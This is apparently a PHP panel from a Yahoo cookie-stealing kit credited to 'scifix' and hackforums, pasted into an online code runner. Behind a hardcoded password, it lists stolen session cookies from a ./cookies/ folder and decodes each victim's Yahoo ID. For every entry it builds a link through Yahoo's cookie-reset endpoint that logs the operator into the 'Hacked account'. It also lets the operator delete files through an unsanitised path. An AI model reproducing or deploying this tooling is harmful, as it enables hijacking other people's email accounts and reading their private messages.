fork download
  1. <?php
  2. $pass = "scifix";
  3.  
  4. ?>
  5.  
  6. <!DOCTYPE html PUBLIC "-//W3C//DTD cookiesTML 1.0 Transitional//EN" "http://w...content-available-to-author-only...3.org/TR/cookiestml1/DTD/cookiestml1-transitional.dtd">
  7. <html xmlns="http://w...content-available-to-author-only...3.org/1999/cookiestml">
  8. <head>
  9. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  10. <title id=xx>scifix</title>
  11. <link rel="stylesheet" href="s.css" />
  12. <script type="text/javascript" src="j.js"></script><style type="text/css">
  13. <!--
  14. body {
  15. background-color: white;
  16. }
  17. -->
  18. </style>
  19. <style type=text/css>
  20. #xx{font-family:"Times New Roman" size:30px}
  21. </style>
  22.  
  23. </head>
  24. <body>
  25. <!---
  26.  
  27. --->
  28. <div id="header" class="header">
  29.  
  30. <td align="left">
  31. <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
  32. <tr align="left">
  33. <td width="50%">&nbsp;</td>
  34. <td width="50%"> <p align="right"><a href="?"><span class="links"> Refresh | </span></a><a href="?logout=1"><span class="links"> LogOut </span></a>
  35. </p></td>
  36. </tr>
  37. </table>
  38. </td>
  39. </td>
  40. </div>
  41. <br />
  42. <br />
  43. <br />
  44.  
  45. <center>
  46. <font color="black" face="Terminal" size=9 >www.hackforums.net</font>
  47. </center>
  48. <center>
  49. <font color="blue" size="6" face="Terminal">SCIFIX AT YOUR SERVICE --sharing is learning--</font>
  50. </center>
  51.  
  52. <br />
  53. <br />
  54. <br />
  55.  
  56.  
  57.  
  58. <div id="wrapper">
  59.  
  60. <table cellpadding="0" cellspacing="0" border="0" class="sortable" id="sorter">
  61. <tr>
  62. <th width="162"><p><font color="red" >Hacked account (Click to access) </font></p></th>
  63. <th width="170"><p><font color="red" >Date</font></p></th>
  64.  
  65. <th width="77"><p><font color="red" >Delete</font></p></th>
  66. </tr>
  67. <?php
  68. if($_GET['logout'] == 1) {
  69. echo "<script>document.cookie ='pass=; path=/'</script>";
  70. echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=?\">";
  71. }
  72.  
  73. if(isset($_POST["pass"])) {
  74. echo "<script>document.cookie ='pass=".$_POST['pass']."; path=/'</script>";
  75. echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=\">";
  76. }
  77. if($_COOKIE['pass'] != $pass) {
  78.  
  79.  
  80. echo '</table></div><div align="center"><b>Enter the password (I hope javascript is on): </b><p><form method="post">' .
  81. '<input type="password" name="pass"> <input type="submit" name="check" value="Login">' .
  82. '</form> </div>';
  83. exit(0);
  84. }
  85.  
  86.  
  87.  
  88. if($_GET['del']) {
  89. @unlink("./cookies/".$_GET['del']);
  90. }
  91.  
  92. if ($handle = opendir('./cookies/')) {
  93. while ($file = readdir($handle)) {
  94. if ($file != "." && $file != ".." && $file != "index.html") {
  95.  
  96.  
  97.  
  98. $fcookie = "./cookies/".$file;
  99. $fh = fopen($fcookie, 'r');
  100. $cookie = fread($fh, filesize($fcookie));
  101.  
  102. $T = explode("T=", $cookie); $T = $T[1];
  103. $T = explode(";", $T); $T = $T[0];
  104.  
  105. $Y = explode("Y=", $cookie); $Y = $Y[1];
  106. $Y = explode(";", $Y); $Y = $Y[0];
  107.  
  108. $yid = explode("l=", $Y); $yid = $yid[1];
  109. $yid = explode("/o", $yid); $yid = $yid[0];
  110.  
  111. $str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
  112. $str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
  113. $id = ""; for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};
  114.  
  115. $p = substr($Y, strpos($Y, "p=") + 2, 7);
  116.  
  117. $date = date ("M d Y H:i:s", filemtime("./cookies/".$file));
  118.  
  119. $lang = explode("lg=", $Y); $lang = $lang[1];
  120. $lang = explode("&", $lang); $lang = $lang[0];
  121.  
  122.  
  123. $sr = array(array(";", "&", "="), array(null, "%26", "%3D"));
  124. $y = "Y%3D" . str_replace($sr[0], $sr[1], $Y);
  125. $t = "T%3D" . str_replace($sr[0], $sr[1], $T);
  126.  
  127. echo "<tr><td><a href=\"http://m...content-available-to-author-only...o.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"><b><font color=white size= 5px> ".$id."</font></b></a></td><td>";
  128. echo $date."</td><td>";
  129.  
  130. echo "<a href=\"?del=".$file."\">Delete it</a></td></tr>";
  131.  
  132. }
  133. }
  134. closedir($handle);
  135. }
  136.  
  137.  
  138. ?>
  139.  
  140. </tr>
  141.  
  142. </table>
  143. </div>
  144. <script type="text/javascript">
  145. var sorter=new table.sorter("sorter");
  146. sorter.init("sorter",1);
  147. </script>
  148.  
  149. </body>
  150. </html>
  151.  
Runtime error #stdin #stdout 0.31s 213696KB
stdin
Standard input is empty
stdout
Standard output is empty